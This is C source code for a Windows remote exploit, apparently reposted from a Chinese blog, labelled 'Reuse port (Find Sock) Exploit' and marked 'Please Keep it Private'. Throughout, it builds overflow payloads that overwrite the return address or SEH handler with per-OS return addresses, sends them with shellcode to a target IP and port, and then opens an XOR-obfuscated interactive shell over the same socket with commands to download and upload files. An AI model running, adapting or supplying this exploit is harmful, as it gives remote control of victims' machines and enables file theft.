- void Make_Payload(int q)
- {
- // server.exe
- memset(Payload, 0x90, sizeof(Payload)-1);
- memcpy(Payload + 52, &os[q].ret, 4);
- strcpy(Payload + 56, (const char *)sh_Buff);
- memcpy(Payload + 56 + strlen((const char *)sh_Buff), "\x90", 1); //为了填充strcpy shellcode后所造成的\x00
-
- /*
- //server_big.exe jmp esp
- memset(Payload, 0x90, sizeof(Payload)-1);
- memcpy(Payload + 1204, &os[q].ret, 4);
- strcpy(Payload + 1208, (const char *)sh_Buff);
- memcpy(Payload + 1208 + strlen((const char *)sh_Buff), "\x90", 1);
- */
- /*
- // server_big.exe overwrite esp+8 (seh)
- // server_big.exe 覆盖 SEH
- memset(Payload, 0x90, sizeof(Payload)-1);
- memcpy(Payload + 1204, POP_POP_RET, 4); //覆盖 eip pop/pop/ret
- memcpy(Payload + 1208, &os[q].ret, 4); // 覆盖 esp
- memcpy(Payload + 1212, &os[q].ret, 4); // 覆盖 esp+4
- memcpy(Payload + 1216, &os[q].ret, 4); // 覆盖 SEH jmp esp
- // memcpy(Payload + 1220, "\x00", 1);
- strcpy(Payload + 1220, (const char *)sh_Buff);
- memcpy(Payload + 1220 + strlen((const char *)sh_Buff), "\x90", 1);
- */
- PrintSc((unsigned char *)Payload, sizeof(Payload));
- }
- // ripped from isno
- int Make_Connection(char *address,int port,int timeout)
- {
- struct sockaddr_in target;
- SOCKET s;
- int i;
- DWORD bf;
- fd_set wd;
- struct timeval tv;
- s = socket(AF_INET,SOCK_STREAM,0);
- if(s<0)
- return -1;
- target.sin_family = AF_INET;
- target.sin_addr.s_addr = inet_addr(address);
- if(target.sin_addr.s_addr==0)
- {
- closesocket(s);
- return -2;
- }
- target.sin_port = htons(port);
- bf = 1;
- ioctlsocket(s,FIONBIO,&bf);
- tv.tv_sec = timeout;
- tv.tv_usec = 0;
- FD_ZERO(&wd);
- FD_SET(s,&wd);
- connect(s,(struct sockaddr *)&target,sizeof(target));
- if((i=select(s+1,0,&wd,0,&tv))==(-1))
- {
- closesocket(s);
- return -3;
- }
- if(i==0)
- {
- closesocket(s);
- return -4;
- }
- i = sizeof(int);
- getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
- if((bf!=0)||(i!=sizeof(int)))
- {
- closesocket(s);
- return -5;
- }
- ioctlsocket(s,FIONBIO,&bf);
- return s;
- }
- void xor_buf(unsigned char *buf, int size)
- {
- int i;
-
- for (i=0; i
- buf[i] ^= Xor_key;
- }
-
- return;
- }
- /* ripped from TESO code and modifed by ey4s for win32 */
- void shell (int sock)
- {
- int l,i,size=0,get_size=0;
- char buf[1024];
- char filename[128];
- HANDLE hFile;
- fd_set FdRead;
- struct timeval time;
- unsigned long ul[2];
- time.tv_sec = 1;
- time.tv_usec = 0;
- while (1)
- {
- ul[0] = 1;
- ul[1] = sock;
- l = select (0, (fd_set *)&ul, NULL, NULL, &time);
- if(l==1)
- {
- l = recv (sock, buf, sizeof (buf), 0);
- if (l <= 0)
- {
- printf ("[-] Connection closed.\n");
- return;
- }
-
- xor_buf((unsigned char *)buf, l);
- l = write (1, buf, l);
- if (l <= 0)
- {
- printf ("[-] Connection closed.\n");
- return;
- }
- }
- else
- {
- l = read (0, buf, sizeof (buf));
- if (l <= 0)
- {
- printf("[-] Connection closed.\n");
- return;
- }
- xor_buf((unsigned char *)buf, l);
- l = send(sock, buf, l, 0);
- if (l <= 0)
- {
- printf("[-] Connection closed.\n");
- return;
- }
-
- xor_buf((unsigned char *)buf, l);
- //+--------------------------------------------
- // get xxx download xxx
- // put xxx upload xxx
- //+--------------------------------------------
- if (strncmp(buf, "get", 3) == 0)
- {
- // obtain filename
- buf[l-1] = 0;
- for (i=l;i>0;i--) {
- if (buf[i] == '\\' || buf[i] == ' ') {
- break;
- }
- }
- strncpy(filename, buf+i+1, l-i-1);
- hFile = CreateFile(
- filename,
- GENERIC_READ|GENERIC_WRITE,
- FILE_SHARE_READ,
- NULL,
- CREATE_ALWAYS,
- FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,
- (HANDLE)NULL
- );
- if ( hFile == INVALID_HANDLE_VALUE ) {
- printf("Create File %s Error!\n", filename);
- continue;
- }
- size = 0;
- FD_ZERO(&FdRead);
- FD_SET(sock, &FdRead);
- for (;;) {
- l = recv(sock, buf, sizeof(buf), 0);
- xor_buf((unsigned char *)buf, l);
-
- WriteFile(hFile, buf, l, (unsigned long *)&i, NULL);
- size += i;
-
- l = select (0, &FdRead, NULL, NULL, &time);
- if (l != 1) {
- memset(buf, 0x0a, 1);
- xor_buf((unsigned char *)buf, 1);
- l = send(sock, buf, 1, 0);
- break;
- }
- }
- printf("Download remote file %s (%d bytes)!\n", filename, size);
- CloseHandle(hFile);
- }
- else if (strncmp(buf, "put", 3) == 0)
- {
- Sleep(1000);
-
- // obtain filename
- buf[l-1] = 0;
- for (i=l;i>0;i--) {
- if (buf[i] == '\\' || buf[i] == ' ') {
- break;
- }
- }
- strncpy(filename, buf+i+1, l-i-1);
- // open file
- hFile = CreateFile(
- filename,
- GENERIC_READ|GENERIC_WRITE,
- FILE_SHARE_READ,
- NULL,
- OPEN_EXISTING,
- FILE_ATTRIBUTE_NORMAL|FILE_ATTRIBUTE_ARCHIVE,
- (HANDLE)NULL
- );
- if ( hFile == INVALID_HANDLE_VALUE ) {
- printf("Open File %s Error!\n", filename);
- continue;
- }
- size = 0;
- // read file and send
- for (;;)
- {
- ReadFile(hFile, buf, 1024, (unsigned long *)&i, NULL);
- if (i == 0)
- {
- break;
- }
- xor_buf((unsigned char *)buf, i);
- l = send(sock, buf, i, 0);
- size += l;
- }
- printf("Upload remote file %s (%d bytes)...", filename, size);
- l = recv (sock, buf, sizeof (buf), 0);
- xor_buf((unsigned char *)buf, l);
-
- l = write (1, buf, l);
- CloseHandle(hFile);
- }
- }
- }
- }
- void Disconnect(SOCKET s)
- {
- closesocket(s);
- WSACleanup();
- }
- void help(char *n)
- {
- printf("+--------------------------------------------------------+\n");
- printf(" Reuse port (Find Sock) Exploit by axis@ph4nt0m\n");
- printf(" Ver 1.0 Please Keep it Private!\n");
- printf("+--------------------------------------------------------+\n");
- printf(" Usage:\n");
- printf(" %s [Target IP] [Target Port] [OSType]\n\n", n);
- printf(" == OSType:\n");
- printf(" 0. Windows CN ALL SP1 POP/POP/RET \n");
- printf(" 1. Windows2000 SP3/SP4 ALL POP/POP/RET\n");
- printf(" 2. Windows CN ALL JMP ESP from ansi page\n");
- printf(" 3. Windows2003 CN SP1 CALL EAX\n");
- printf(" 4. WindowsXP CN SP2 JMP EAX\n");
- printf(" 5. TEST RET\n");
- }
- int main(int argc, char *argv[])
- {
- unsigned short port = 25;
- SOCKET s;
- WSADATA WSAData;
- if(argc != 4)
- {
- help(argv[0]);
- return 0;
- }
- if(argc == 4) port = atoi(argv[2]);
-
-
- GetShellCode();
- if (!sh_Len)
- {
- printf("[-] Shellcode generate error.\n");
- exit(1);
- }
- printf("shellcode length is: %d \n",strlen((char *)sh_Buff));
- if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
- {
- fprintf(stderr, "[-] WSAStartup failed.\n");
- WSACleanup();
- exit(1);
- }
- s = Make_Connection(argv[1], port, 10);
- if(s<0)
- {
- fprintf(stderr, "[-] connect err.\n");
- exit(1);
- }
- //OS type
- int p = 0;
- if(argc > 3)
- p = atoi(argv[3]);
- Make_Payload(p);
- //Send our evil Payload
- printf("[+]Sending our Evil Payload.\n");
- send(s, Payload, sizeof(Payload), 0);
- Sleep(100);
- // send real shellcode
- send(s, magic_shellcode, Magic_Len, 0);
- Sleep(1000);
- // use same socket to get shell
- shell(s);
- WSACleanup();
- return 1;
- }
阅读(1165) | 评论(0) | 转发(0) |
